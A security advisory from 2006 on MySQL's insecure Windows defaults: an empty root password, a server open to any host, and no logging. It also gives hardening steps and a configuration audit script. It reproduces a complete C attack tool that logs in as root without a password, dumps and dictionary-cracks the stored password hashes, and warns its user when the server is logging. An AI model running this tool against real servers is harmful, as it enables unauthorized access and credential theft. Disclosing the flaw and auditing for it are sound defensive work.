Multiple Default-Configuration Vulnerabilities in MySQL on Windows

Source: Internet users
2006-12-16 16:51:04

Affected systems:

MySQL AB MySQL 3.23.9

MySQL AB MySQL 3.23.8

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.51

MySQL AB MySQL 3.23.50

MySQL AB MySQL 3.23.5

MySQL AB MySQL 3.23.49

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.46

MySQL AB MySQL 3.23.45

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.43

MySQL AB MySQL 3.23.42

MySQL AB MySQL 3.23.41

MySQL AB MySQL 3.23.40

MySQL AB MySQL 3.23.4

MySQL AB MySQL 3.23.39

MySQL AB MySQL 3.23.38

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.34

MySQL AB MySQL 3.23.31

MySQL AB MySQL 3.23.30

MySQL AB MySQL 3.23.3

MySQL AB MySQL 3.23.29

MySQL AB MySQL 3.23.28 gamma

MySQL AB MySQL 3.23.28

MySQL AB MySQL 3.23.27

MySQL AB MySQL 3.23.26

MySQL AB MySQL 3.23.25

MySQL AB MySQL 3.23.24

MySQL AB MySQL 3.23.23

MySQL AB MySQL 3.23.2

MySQL AB MySQL 3.23.10

MySQL AB MySQL 3.22.32

MySQL AB MySQL 3.22.30

MySQL AB MySQL 3.22.29

MySQL AB MySQL 3.22.28

MySQL AB MySQL 3.22.27

MySQL AB MySQL 3.22.26

- Microsoft Windows NT 4.0

- Microsoft Windows 98

- Microsoft Windows 2000

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 5513

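MySQL is an open-source relational database system that runs on many operating systems, including Microsoft Windows.

The default MySQL configuration has several problems. A remote attacker can use them to access the database and alter database operations, and the attack goes unlogged.

The default MySQL configuration on Windows has three problems:

1) Empty default root password:

MySQL manages users through the internal system table 'mysql.user', which holds each user's name, password and host fields. By default MySQL sets no password on the root account, so an attacker can log in with this account without a password.

2) Binding to a non-loopback address:

Most MySQL users install and run the database on the same host as the web server. In the MySQL configuration file the line 'bind-address=127.0.0.1' is commented out. If the server were bound to the loopback address, only the host running the database could access it; because the line is commented out, MySQL allows any user to log in from any host. Combined with the empty root password, this gives access to the database with root privileges.

The two problems above show up as follows:

The user table of a default MySQL installation on Windows looks like this: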

mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host      | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root |          | Y           | Y          |
| %         | root |          | Y           | Y          |
| localhost |      |          | Y           | Y          |
| %         |      |          | N           | N          |
+-----------+------+----------+-------------+------------+

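The root password is empty and the host field is '%', which allows connections from any host. MySQL on Windows can therefore be logged into as root, without a password, from any host.

3) No logging:

Logging is a necessary part of any software. By default MySQL on Windows keeps no logs, which means an administrator cannot detect whether the database has been compromised, and an attacker's brute-force guessing of accounts is not recorded either.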

<*Source: Mike Bommarito (g0thm0g@attbi.com)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2

*>

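Test method:

--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Mike Bommarito (g0thm0g@attbi.com) provided the following test program: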

//mysqlfuck.c

/*--||MySQLfuck||--*/

/*Written by g0thm0g*/

/*-----------------*/

/*Earlier this summer (at least where I live), I had a

conversation with a friend.

It was one of those afternoons where you get an idea,

and it kinda sticks with you.

Anyway, our conversation involved a couple questions

about INSERT's into a MySQL

database. Eventually, I told him that I would do it

for him. I came over, sat down

on his computer, and accidentally typed his full IP

address in. TO my surprise, the

host still connected. Even worse, root login wasn't

passworded. I figured that he

had mysql bound to 127.0.0.1, and that no real remote

host could connect. However,

later that night after I had gone home, I got a phone

call from the friend asking me

to do it again. Already on the computer (go figure

d:), I pulled up bash and

typed in his IP. Right as I was about to ask him what

his password was, I noticed

that MySQL hadn't even bothered to authenticate me. I

"used mysql" and then SELECT'ed

user,password,host FROM user. To my horror, I received:

+------+----------+-----------+

| user | password | host |

+------+----------+-----------+

| root | | localhost |

| root | | % |

| | | localhost |

| | | % |

+------+----------+-----------+

Not only was name-less login allowed, but root was

without password on localhost

and remote. Anyway, to make a long story short, I did

some research, and found that

default Windows MySQL configuration lacks logging or

authentication. I did some

network scanning, and I think I have around 400 hosts

with no root password. Anyway,

to automate checking this, I wrote this program up. It

tries to login as root/NULL,

then takes the values of the user password hashes and

tries to find a match to a

dictionary file called dictionary.txt.

I wrote up an advisory, which you'll probably see on

SecFoc soon.

If I had some cookies, I'd give them to:

-Tiefer and his relentless questioning and jokes about

my sister

-Club 21, especially for Hard Attack

-DJ Doboy, can't forget trancequility volume 19

(INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE"

CLAUSE HERE)

(INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE)

Compile:

-MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2

-GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2

-Cheers

g0th

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#ifdef WIN32

#include <windows.h>

#endif

#include <mysql.h>

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*Crazy MySQL programmers and their short typedefs*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

#ifndef ulong

#define ulong unsigned long

#endif

#ifndef uint

#define uint unsigned int

#endif

#ifndef uchar

#define uchar unsigned char

#endif

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*##--####--####--####--####--####--####--####--##*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

/*--------------------------------------------------------------*/

/*<<<<This section is ripped straight from the MySQL

source.>>>>*/

/*I have this all nice and optimized in assembly on my

end, but*/

/*writing cross-compiler inline is not too fun, and

requiring an*/

/*assembler is kinda frustrating.*/

/*--------------------------------------------------------------*/

void hash_password(ulong *result, const char *password)

{

register ulong nr=1345345333L, add=7, nr2=0x12345671L;

ulong tmp;

for (; *password ; password++)

{

if (*password == ' ' || *password == '\t')

continue; /* skipp space in password */

tmp= (ulong) (uchar) *password;

nr^= (((nr & 63)+add)*tmp)+ (nr << 8);

nr2+=(nr2 << 8) ^ nr;

add+=tmp;

}

result[0]=nr & 2147483647; /* Don't use sign bit (str2int) */;

result[1]=nr2 & 2147483647;

return;

}

void make_scrambled_password(char *to,const char *password)

{

ulong hash_res[2];

hash_password(hash_res,password);

sprintf(to,"%08lx%08lx",hash_res[0],hash_res[1]);

}

/*--------------------------------------------------------------*/

/*<<<<######################################################>>>>*/

/*--------------------------------------------------------------*/

/*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/

/*--------------------------------*/

/*<<<user struct to store data>>>>*/

/*--------------------------------*/

typedef struct

{

char *user;

char *password;

} user;

#define MAX_USERS 16

/*--------------------------------*/

/*<<<<########################>>>>*/

/*--------------------------------*/

//main - for "coherency's" (yes, i mean laziness) sake, i've kept this a single function

int

main

(

int argc,

char** argv

)

{

MYSQL * mysqlData; //--|-

MYSQL_RES * mysqlResult; //--|-MySQL Datatypes

MYSQL_ROW mysqlRow; //--|-

char *spHost; //--|

char *spUser="root"; //--|

char *spPassword=NULL; //--|-Our connection data

int spPort=3306; //--|

char *spServerVersion; //--|

int usernum=0; //--|

user *users[MAX_USERS]; //--|-User name/hash storage data

FILE *fin, *fout; //--|

char *file_name; //--|-File I/O data

char *line=(char *)malloc(64); //--|

char *buff=(char *)malloc(64); //--|-Miscellaneous buffers

int i=0; //--|Counter

//Warn about not meeting minimal arguments

if (2>argc)

{

fprintf (stderr, "usage: mysqlfuck host [-p<port>]");

return -1;

}

//Copy the first argument into the host buffer

spHost=(char *)malloc(strlen(argv[1])+1); //room for the string and its terminator, not sizeof a pointer

strcpy (spHost, argv[1]);

//Copy port if the user specified

if (argv[2])

{

if (argv[2][1]=='p')

{

++argv[2];

++argv[2];

spPort=atoi(argv[2]);

printf ("port: %i\n", spPort);

}

}

//Initialize MySQL data and connect with root/NULL

mysqlData = (MYSQL *)malloc(sizeof(MYSQL));

mysql_init (mysqlData);

if (! mysql_real_connect (mysqlData, spHost, spUser,

spPassword, "mysql", spPort, NULL, 0) )

{

fprintf (stderr, "mysql_real_connect: %s\n",

mysql_error (mysqlData));

return -1;

}

//If the server logs, inform the user!

printf ("server version: %s\n",

mysql_get_server_info(mysqlData));

if (strstr (mysql_get_server_info (mysqlData), "log"))

{

printf ("Warning! Server is logging - Continue(*/n)?");

if (getchar()=='n')

{

mysql_close (mysqlData);

return -1;

}

}

//"Obtain" the hashes (notice i didn't use the word steal)

if ( mysql_query (mysqlData, "SELECT user,password FROM user") )

{

fprintf (stderr, "mysql_query: %s\n", mysql_error

(mysqlData));

return -1;

}

//Store the result and process it

mysqlResult=mysql_store_result(mysqlData);

while (usernum<MAX_USERS && (mysqlRow=mysql_fetch_row(mysqlResult))) //stay inside the users[] array

{

if (strlen(mysqlRow[0])==0)

{

mysqlRow[0]="(NULL)";

}

if (strlen(mysqlRow[1])==0)

{

mysqlRow[1]="(NULL)";

}

users[usernum]=(user *)malloc(sizeof(user));

users[usernum]->user=(char

*)malloc(strlen(mysqlRow[0])+1);

strcpy (users[usernum]->user, mysqlRow[0]);

users[usernum]->password=(char

*)malloc(strlen(mysqlRow[1])+1);

strcpy (users[usernum]->password, mysqlRow[1]);

usernum++;

}

mysql_close (mysqlData);

//Setup output file name string

file_name=(char *)malloc (strlen(spHost)+5); //host + ".txt" + terminator

strcpy (file_name, spHost);

strcat (file_name, ".txt\0\0");

printf ("\n+----------------------------+\n");

printf ("<decrypting and dumping to %s>\n", file_name);

printf ("+----------------------------+\n");

fout=fopen (spHost, "w");

if (!fout)

{

fprintf (stderr, "Unable to open %s for password dumping\n", spHost);

return -1;

}

//Use a database to crack the hashes (optional)

fin=fopen ("dictionary.txt", "r");

if (!fin)

{

fprintf (stderr, "error opening dictionary.txt - no decryption will take place\n");

for (i=0;i<usernum;i++)

{

printf ("%s::%s\n", users[i]->user,

users[i]->password);

}

return -1;

}

//Loop through the user array and crack/output hashes

for (i=0;i<usernum;i++)

{

if (users[i]->user)

{

if (users[i]->password)

{

while ( (fgets (line, 63, fin)))

{

line[strlen(line)-1]='\0';

make_scrambled_password (buff, line);

if (strcmp (buff, users[i]->password)==0)

{

users[i]->password=line;

break;

}

}

fclose (fin);

fprintf (fout, "%s::%s\n", users[i]->user,

users[i]->password);

printf ("%s::%s\n", users[i]->user,

users[i]->password);

fflush (fout);

}

}

}

//Always clean up after yourself!

fclose (fout);

if (buff)

free (buff);

if (line)

free (line);

if (spHost)

free (spHost);

if (users)

free (users);

if (file_name)

free (file_name);

if (mysqlData)

free (mysqlData);

}

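Recommendations:

--------------------------------------------------------------------------------

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:

* 1) Set a password for root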

mysql> set password for root@localhost=password('password');

* 2) Delete the anonymous users and the records whose Host field is % from the user table

mysql> delete from user where user='';

mysql> delete from user where host='%';

mysql> flush privileges;

* 3) Remove the comment marker from the 'bind-address=127.0.0.1' line in the configuration file, then restart MySQL.

* 4) Add to my.ini:

log-long-format

log=/path/to/somewhere/log.txt

Then restart MySQL.
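The four steps above can be verified after the fact. The following is an added example, not part of the original advisory or of MySQL: it audits the text of a my.ini and the mysql client's printout of the user table for the three default problems. The function names are hypothetical and both sample inputs are constructed.

```python
import re

# Constructed sample inputs: a my.ini in the default state the advisory
# describes and the user table as printed by the mysql client.
SAMPLE_INI = """\
[mysqld]
basedir=C:/mysql
#bind-address=127.0.0.1
"""

SAMPLE_USER_TABLE = """\
+-----------+------+----------+
| Host      | User | Password |
+-----------+------+----------+
| localhost | root |          |
| %         | root |          |
| localhost |      |          |
| %         |      |          |
+-----------+------+----------+
"""


def parse_ini(text):
    """Return the active [mysqld] options; commented-out lines do not count."""
    section, opts = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
        elif section == "mysqld":
            key, _, value = line.partition("=")
            opts[key.strip().lower()] = value.strip()
    return opts


def parse_table(text):
    """Turn mysql client table output into dicts keyed by lower-cased column."""
    rows = [[cell.strip() for cell in line.strip()[1:-1].split("|")]
            for line in text.splitlines() if line.strip().startswith("|")]
    if not rows:
        return []
    columns = [name.lower() for name in rows[0]]
    return [dict(zip(columns, row)) for row in rows[1:]]


def audit(ini_text, table_text):
    """List every default-configuration problem found in the two inputs."""
    findings = []
    opts = parse_ini(ini_text)
    if opts.get("bind-address") != "127.0.0.1":
        findings.append("bind-address: not bound to loopback")
    if "log" not in opts:
        findings.append("log: logging is not enabled")
    for row in parse_table(table_text):
        who = "%s@%s" % (row["user"] or "(anonymous)", row["host"])
        if not row["password"]:
            findings.append("account %s: empty password" % who)
        if not row["user"]:
            findings.append("account %s: anonymous user" % who)
        if "%" in row["host"]:
            findings.append("account %s: wildcard host" % who)
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_INI, SAMPLE_USER_TABLE):
        print(finding)
```

An empty result means the workaround steps are all in place; the table text can be captured by running the select statement shown earlier against the mysql database.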

Vendor patch:

MySQL AB

--------

The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.mysql.com/

 